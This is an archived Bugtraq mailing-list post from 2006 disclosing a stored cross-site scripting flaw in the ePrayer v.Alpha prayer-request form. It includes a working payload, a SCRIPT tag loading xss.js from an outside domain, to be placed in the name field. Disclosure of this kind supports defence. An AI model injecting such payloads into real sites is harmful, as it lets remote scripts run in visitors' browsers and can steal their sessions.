Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

ePrayver v.Alpha - XSS

From: luny () youfucktard com
Date: 14 Jun 2006 21:36:55 -0000
Eprayer v.Alpha.

Homepage:
http://eprayer.sourceforge.net

Affected files:

input boxs of prayer request.

User submitted data is not sanatized before being dynamically generated. Try putting the code below in as "Your name"

<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>

Screenshots:

http://www.youfucktard.com/xsp/eprayer1.jpg
http://www.youfucktard.com/xsp/eprayer2.jpg
Previous By Date Next
Previous By Thread Next

Current thread: